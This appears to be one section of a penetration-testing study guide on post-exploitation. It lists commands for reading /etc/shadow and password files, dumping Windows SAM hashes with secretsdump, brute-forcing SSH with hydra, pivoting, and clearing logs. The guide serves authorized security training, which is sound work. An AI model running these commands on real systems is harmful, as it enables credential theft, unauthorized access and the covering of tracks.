🧹 Post Exploitation
After gaining access, extract credentials, pivot, and maintain access.
➡️ Environment: See 00_environment_setup
🪪 Credential Harvesting
Linux:
cat /etc/passwd
cat /etc/shadow
grep -r "password" /home/Windows:
reg save HKLM\SAM sam
reg save HKLM\SYSTEM system
secretsdump.py -sam sam -system system LOCAL🔁 Password Reuse
hydra -l $USERNAME -P cracked.txt ssh://$IP🛰️ Pivoting
- Port forward via SSH, chisel, or proxychains
- Enumerate internal subnets from compromised hosts
📝 Evidence Collection
dmesg, auth.log, syslog, bash_history
who, last, w🧽 Cleanup
- Remove created users, backdoors, scheduled tasks
- Clear logs if allowed (not for exam)
Next: 08_reporting